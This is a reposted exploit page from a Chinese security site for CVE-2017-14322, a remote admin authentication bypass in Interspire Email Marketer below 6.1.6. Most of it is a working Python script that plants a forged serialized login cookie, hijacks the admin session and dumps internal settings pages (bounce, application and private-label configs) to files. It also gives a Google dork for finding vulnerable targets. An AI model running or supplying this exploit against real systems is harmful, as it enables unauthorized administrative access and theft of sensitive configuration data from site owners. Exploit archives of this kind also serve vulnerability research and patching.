首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass 来源：https://github.com/joesmithjaffa 作者：devcoinfet 发布时间：2018-04-25   ''' # Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass # Google Dork: intitle:"Control Panel" + emailmarketer # Date: 4-22-18 # Exploit Author: devcoinfet # Vendor Homepage: www.interspire.com/emailmarketer # Software Link: Can't legally provide link but can be found on net # Version: [6.1.3-6.1.6] # Tested on: Below 6.1.6 # CVE : CVE-2017-14322   https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html https://github.com/joesmithjaffa/CVE-2017-14322 thanks to above Researchers   1. Description       this is used like this -------------------------- exploit.py url/email-marketer/admin/index.php     2. Proof of Concept '''     import requests import sys from bs4 import BeautifulSoup from pprint import pprint     def cookie_cutter(url):     with requests.Session() as s:        s.get(url)        r = s.get(url)        response_regex = r.text        print("requesting initial Cookie\n")        print(str(r.headers)+"\n")                for key,value in s.cookies.items():            if key and "IEMSESSIONID" in key:                          s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")        print("Attempting To Posion 2nd request with Forged Cookie\n")        print("-" * 25)        r = s.get(url)        response_regex2 = r.text        print response_regex2        print(str(r.headers) + "\n")        if response_regex != response_regex2:             for key,value in s.cookies.items():               if "IEMSESSIONID" in key:                  try:                     #using session riding from previous cookie we grab the info we want :)                     bounce_info_grab(url,value)                     app_info_grab(url,value)                     privt_info_grab(url,value)                  except:                      pass                  return value,r.text     def bounce_info_grab(url,session_to_ride):     url_grab = url+"?Page=Settings&Tab=2"     print(url_grab)     with requests.Session() as s:        s.get(url_grab)        s.cookies.set('IEMSESSIONID',session_to_ride)        r = s.get(url_grab)        response_regex = r.text        soup = BeautifulSoup(response_regex,'html5lib')        div = soup.find('div', id='div7')                        outfile = open("bounce_report.txt",'w')        dataout = """<html><head>Report</head><title>Report</title>                     <body>""" + str(div) +"""</body></html>"""        outfile.write(dataout)        outfile.close()        for divy in div.contents:            print(divy)            def app_info_grab(url,session_to_ride):     url_grab = url+"?Page=Settings&Tab=2"     print(url_grab)     with requests.Session() as s:        s.get(url_grab)        s.cookies.set('IEMSESSIONID',session_to_ride)        r = s.get(url_grab)        response_regex = r.text        soup = BeautifulSoup(response_regex,'html5lib')        div = soup.find('div', id='div1')                      outfile = open("application_settings_report.txt",'w')        dataout = """<html><head>Report</head><title>Report</title>                     <body>""" + str(div) +"""</body></html>"""        outfile.write(dataout)        outfile.close()        for divy in div.contents:            print(divy)        def privt_info_grab(url,session_to_ride):     url_grab = url+"?Page=Settings&Tab=2"     print(url_grab)     with requests.Session() as s:        s.get(url_grab)        s.cookies.set('IEMSESSIONID',session_to_ride)        r = s.get(url_grab)        response_regex = r.text        soup = BeautifulSoup(response_regex,'html5lib')        div = soup.find('div', id='div8')                       outfile = open("privtlbl_settings_report.txt",'w')        dataout = """<html><head>Report</head><title>Report</title>                     <body>""" + str(div) +"""</body></html>"""        outfile.write(dataout)        outfile.close()        for divy in div.contents:            print(divy)        def main():     url = sys.argv[1]     print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"     print "-" * 25     try:        session_rider_value,content = cookie_cutter(url)        print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"        print "-" * 25        print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "        print "-" * 25        print  session_rider_value+"\n"        print "-" * 25     except:        print "Target Is Not Vulnerable"        pass            main()   ''' When Running this, if it is succesful check for 3 files in the directory of exploit to find crucial internal configs in Html format do not use this for bad just dont do it please.     3. Solution:     Update to version 6.1.6 atleast http://www.interspire.com/emailmarketer '''   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PRTG Network Monitor < 18.1.39 ·VLC Media Player/Kodi/PopcornT ·Apache CouchDB 1.7.0 and 2.x b ·Ericsson-LG iPECS NMS A.1Ac - ·Kaspersky KSN Remote Code Exec ·R 3.4.4 - Local Buffer Overflo ·lastore-daemon D-Bus Privilege ·Allok Video to DVD Burner 2.6. ·ASUS infosvr Authentication By ·Easy File Sharing Web Server 7 ·Chrome V8 JIT NodeProperties:: ·VMware Workstation 12.5.2 - Dr   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved